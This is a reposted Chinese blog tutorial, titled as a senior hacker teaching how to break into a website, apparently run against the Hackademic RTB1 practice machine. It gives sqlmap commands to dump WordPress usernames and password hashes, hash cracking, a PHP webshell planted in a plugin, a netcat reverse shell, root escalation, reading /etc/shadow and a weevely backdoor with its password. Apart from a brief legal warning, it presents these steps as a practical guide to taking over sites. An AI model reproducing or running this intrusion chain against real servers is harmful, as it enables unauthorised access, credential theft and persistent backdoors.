码迷,mamicode.com
首页 > Web开发 > 详细

资深hacker带大家如何攻破一个网站!超级详细的教学教程

时间:2019-03-03 00:03:12      阅读:936      评论:0      收藏:0      [点我收藏+]

标签:命令   img   dash   表名   ada   rtb   电脑   rev   use   

温馨提示:非法利用网络技术可违反计算机信息破坏罪,切勿利用技术违法犯罪。

话不多说今天带大家实战如何轻松拿站

技术图片
技术图片

现在我们获取了网站服务器的IP地址为:173.236.138.113

寻找同一服务器上的其它网站,我们使用sameip.org.

技术图片
技术图片
技术图片

我们需要关于你网站的以下信息:

  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)

让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.

技术图片

我们发现你的DNS记录如下

技术图片

让我们来确定web服务器的类型

技术图片
技术图片
技术图片

我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.

我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.

技术图片
技术图片

我们发现你的网站使用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:

1-Find services that run on server(查看服务器上运行的服务)

技术图片

2-Find server OS(查看操作系统版本)

技术图片
技术图片
技术图片

我们也会用到Backtrack 5 R1中的W3AF 工具:

root@bt:/pentest/web/w3af#./w3af_gui

技术图片

我们输入要检测的网站地址,选择完整的安全审计选项.

技术图片

稍等一会,你将会看到扫描结果.

技术图片

发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.

Using sqlmap with –u url

技术图片

过一会你会看到

技术图片

输入N按回车键继续

技术图片

我们发现你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.

技术图片
技术图片

发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名

技术图片
技术图片

通过参数“-T wp_users –columns ”来查看wp_users表中的字段.

技术图片
技术图片

接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”

技术图片

我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes

http://www.onlinehashcrack.com/free-hash-reverse.php

技术图片

登陆wordpress的后台wp-admin

尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.

技术图片
技术图片

Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。

我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.

技术图片

然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.

技术图片

点击连接我们会看到

技术图片

接下来我们尝试执行一些命令:

id

uid=48(apache) gid=489(apache) groups=489(apache)

(用来显示用户的id和组)

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

(显示服务器上当前的路径)

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

(显示内核版本信息)

技术图片
技术图片
技术图片
技术图片

执行完成之后我们输入id命令

id

我们发现我们已经是root权限了

uid=0(root) gid=0(root)

技术图片

现在我们可以查看/etc/shadow文件

cat/etc/shadow

技术图片
技术图片

2.用weevely创建一个密码为koko的php后门

root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

技术图片

接下来上传到服务器之后来使用它

root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

技术图片

测试我们的hax.php后门

技术图片

完成,撒花!

资深hacker带大家如何攻破一个网站!超级详细的教学教程

标签:命令   img   dash   表名   ada   rtb   电脑   rev   use   

原文地址:https://www.cnblogs.com/luchangjiang/p/10463471.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!